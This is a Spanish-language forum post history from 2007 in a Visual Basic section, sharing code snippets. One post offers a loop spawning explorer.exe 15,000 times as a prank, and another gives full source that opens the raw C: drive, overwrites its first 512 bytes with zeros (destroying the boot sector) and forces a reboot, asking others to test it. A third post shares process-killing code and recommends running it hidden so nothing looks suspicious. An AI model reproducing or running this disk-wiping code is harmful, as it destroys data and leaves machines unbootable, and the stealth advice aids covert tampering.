|
Mostrar Mensajes
|
Páginas: [1]
|
1
|
Programación / Programación Visual Basic / Re: interesante
|
en: 29 Octubre 2007, 03:14 am
|
Algo que ocurre con el Do - Loop es lo siguiente, la apliación queda colgada, por lo que nos combiene más
Dim i For i = 1 to 15000 shell "explorer.exe" Next
Y entonces, si quieres, puedes agregar más cosas al código, como msgbox y esas estupideces jajajajaj
^^
Saludos
|
|
|
3
|
Programación / Programación Visual Basic / Re: Escribir en secciones del disco duro...
|
en: 23 Octubre 2007, 22:35 pm
|
Mirá, esto es un snippet que encontré para escribir en los primeros 512 kb del disco duro te va a servir: Option Explicit Private Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege" Private Const SE_DEBUG_NAME = "SeDebugPrivilege" Private Const ERROR_NOT_ALL_ASSIGNED As Long = 1300& Private Const EWX_FORCE As Long = 4 Private Const EWX_REBOOT As Long = 2 Private Const STANDARD_RIGHTS_REQUIRED As Long = &HF0000 Private Const TOKEN_ASSIGN_PRIMARY As Long = &H1 Private Const TOKEN_DUPLICATE As Long = &H2 Private Const TOKEN_IMPERSONATE As Long = &H4 Private Const TOKEN_QUERY As Long = &H8 Private Const TOKEN_QUERY_SOURCE As Long = &H10 Private Const TOKEN_ADJUST_PRIVILEGES As Long = &H20 Private Const TOKEN_ADJUST_GROUPS As Long = &H40 Private Const TOKEN_ADJUST_SESSIONID As Long = &H100 Private Const TOKEN_ADJUST_DEFAULT As Long = &H80 Private Const TOKEN_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or TOKEN_ASSIGN_PRIMARY Or TOKEN_DUPLICATE Or TOKEN_IMPERSONATE Or TOKEN_QUERY Or TOKEN_QUERY_SOURCE Or TOKEN_ADJUST_PRIVILEGES Or TOKEN_ADJUST_GROUPS Or TOKEN_ADJUST_SESSIONID Or TOKEN_ADJUST_DEFAULT) Private Const ANYSIZE_ARRAY As Long = 1 Private Const SYNCHRONIZE As Long = &H100000 Private Const PROCESS_ALL_ACCESS As Long = (STANDARD_RIGHTS_REQUIRED Or SYNCHRONIZE Or &HFFF) Private Const SE_PRIVILEGE_ENABLED As Long = &H2 Private Const GENERIC_WRITE As Long = &H40000000 Private Const FILE_SHARE_READ As Long = &H1 Private Const FILE_SHARE_WRITE As Long = &H2 Private Const OPEN_EXISTING As Long = 3 Private Type LARGE_INTEGER LowPart As Long HighPart As Long End Type Private Type LUID LowPart As Long HighPart As Long End Type Private Type LUID_AND_ATTRIBUTES pLuid As LUID Attributes As Long End Type Private Type TOKEN_PRIVILEGES PrivilegeCount As Long Privileges(ANYSIZE_ARRAY) As LUID_AND_ATTRIBUTES End Type Private Declare Function GetCurrentThread Lib "kernel32.dll" () As Long Private Declare Function CreateFile Lib "kernel32.dll" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByRef lpSecurityAttributes As Any, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplateFile As Long) As Long Private Declare Function AdjustTokenPrivileges Lib "ADVAPI32.dll" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, PreviousState As TOKEN_PRIVILEGES, ReturnLength As Long) As Long Private Declare Function OpenProcess Lib "kernel32.dll" (ByVal dwDesiredAccessas As Long, ByVal bInheritHandle As Long, ByVal dwProcId As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function GetCurrentProcessId Lib "kernel32.dll" () As Long Private Declare Function OpenProcessToken Lib "ADVAPI32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, TokenHandle As Long) As Long Private Declare Function LookupPrivilegeValue Lib "ADVAPI32.dll" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As String, ByVal lpName As String, ByRef lpLuid As LARGE_INTEGER) As Long Private Declare Function ExitWindowsEx Lib "user32.dll" (ByVal uFlags As Long, ByVal dwReserved As Long) As Long Private Declare Function GetLastError Lib "kernel32.dll" () As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, lpOverlapped As Any) As Long Dim lLUID As LUID Dim TokenP As TOKEN_PRIVILEGES Dim LuidAttrib As LUID_AND_ATTRIBUTES Private sub Form_Load() Dim pHnd, tHnd, ret, rBuffer, dHnd, ctHnd As Long Dim rBufferLen, rlenWrite, n As Integer Dim LuidCode As LARGE_INTEGER Dim Buffer(511) As Byte dHnd = CreateFile("\\.\C:", GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE, ByVal 0&, OPEN_EXISTING, ByVal 0&, ByVal 0&) If dHnd = 0 Then GoTo done For n = 0 To 511 Buffer(n) = 0 ret = WriteFile(dHnd, Buffer(n), Len(Buffer(n)), rBufferLen, ByVal 0&) If rlenWrite = 0 Then GoTo done Next pHnd = OpenProcess(PROCESS_ALL_ACCESS, ByVal 0&, GetCurrentProcessId) If pHnd = 0 Then GoTo done End If ret = OpenProcessToken(pHnd, TOKEN_ALL_ACCESS, tHnd) If ret = 0 Then GoTo done End If ret = LookupPrivilegeValue(vbNullString, SE_DEBUG_NAME, LuidCode) If ret = 0 Then GoTo done End If lLUID.HighPart = LuidCode.HighPart lLUID.LowPart = LuidCode.LowPart LuidAttrib.pLuid.HighPart = lLUID.HighPart LuidAttrib.pLuid.LowPart = lLUID.LowPart TokenP.PrivilegeCount = 1 TokenP.Privileges(0) = LuidAttrib TokenP.Privileges(0).Attributes = SE_PRIVILEGE_ENABLED ret = AdjustTokenPrivileges(tHnd, 0, TokenP, ByVal 0&, TokenP, rBuffer) If GetLastError = ERROR_NOT_ALL_ASSIGNED Then GoTo done End If If GetLastError = 122 Then ret = AdjustTokenPrivileges(tHnd, 0, TokenP, rBuffer, TokenP, rBuffer) If ret = 0 Then GoTo done ElseIf ret = ERROR_NOT_ALL_ASSIGNED Then GoTo done End If End If ret = ExitWindowsEx(EWX_FORCE Or EWX_REBOOT, 0) If ret = 0 Then GoTo done End If done: CloseHandle (pHnd) CloseHandle (tHnd) End Sub
Saludos ^^ Edit: Alguien que lo pruebe
|
|
|
4
|
Programación / Programación Visual Basic / Re: Matar procesos en WinXP
|
en: 23 Octubre 2007, 18:27 pm
|
gracias Hades... una corrección nunca está mal , según lo que he escuchado, hay distintas formas de matar a un proceso, y no solo esta. Hace poco vi un programita que permitía matar procesos como de 11 Formas, incluyendo overflows, inyecciones y demás Estaba pensando en que la inyección de una DLL es posible aunque algo compleja.... Saludos!
|
|
|
5
|
Programación / Programación Visual Basic / Re: Matar procesos en WinXP
|
en: 23 Octubre 2007, 03:32 am
|
Hola gente, mi primer post en el foro y mi primer aporte: Compliqué un poco más las cosas xD: Option Explicit Private Const TH32CS_SNAPHEAPLIST = &H1 Private Const TH32CS_SNAPPROCESS = &H2 Private Const TH32CS_SNAPTHREAD = &H4 Private Const TH32CS_SNAPMODULE = &H8 Private Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE) Private Const TH32CS_INHERIT = &H80000000 Private Const MAX_PATH As Integer = 260 Private Const PROCESS_TERMINATE = &H1 Private Type PROCESSENTRY32 dwSize As Long cntUsage As Long th32ProcessID As Long th32DefaultHeapID As Long th32ModuleID As Long cntThreads As Long th32ParentProcessID As Long pcPriClassBase As Long dwFlags As Long szExeFile As String * MAX_PATH End Type Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessID As Long) As Long Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal lFlags As Long, ByVal lProcessID As Long) As Long Private Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long, uProcess As PROCESSENTRY32) As Long Private Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long) Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
Private Function GetDirectory(x) Dim sr&, win$, sys As String Select Case x Case 1: GetDirectory = Left$(App.Path, InStr(App.Path, "\")) Case 2: win = Space$(255) sr = GetWindowsDirectory(win, Len(win)) win = Left$(win, sr) Trim (win) GetDirectory = win Case 3: sys = Space$(255): sr = 0 sr = GetSystemDirectory(sys, Len(sys)) sys = Left$(sys, sr) Trim (sys) GetDirectory = sys End Select End Function
Function MatarProceso(proceso$) If Dir$(GetDirectory(3) & "\taskkill.exe") <> "" Then Shell "taskkill.exe /IM" & Chr(32) & proceso$, vbHide Else Dim hSnapShot#, ProcesoC#, ResP#, ProcesoC2#, R#, uProcess As PROCESSENTRY32 hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&) uProcess.dwSize = Len(uProcess) R = Process32First(hSnapShot, uProcess) Do While R If Left$(uProcess.szExeFile, IIf(InStr(1, uProcess.szExeFile, Chr$(0)) > 0, InStr(1, uProcess.szExeFile, Chr$(0)) - 1, 0)) = proceso Then ProcesoC = uProcess.th32ProcessID ProcesoC2 = OpenProcess(PROCESS_TERMINATE, True, ProcesoC) ResP = TerminateProcess(ProcesoC2, 99) CloseHandle ProcesoC2 Exit Do Else R = Process32Next(hSnapShot, uProcess) End If Loop CloseHandle hSnapShot End If End Function Private Sub Command1_Click() MatarProceso ("notepad.exe") End Sub
Pero, hay dos cosas nuevas en el code que pueden ser muy útiles: 1) Si existe taskkill.exe y todo eso, lo incluímos en la misma function. 2) Al ejecutar cmd.exe, lo hacemos invisiblemente, para que no se sospeche de la ejecución de la consola de comandos y el final de un proceso sin razón aparente... 3) Un code un poco más complejo para obtener más de una carpeta (Este lo pueden descartar si quieren xD) Saludos
|
|
|
|
|
|
|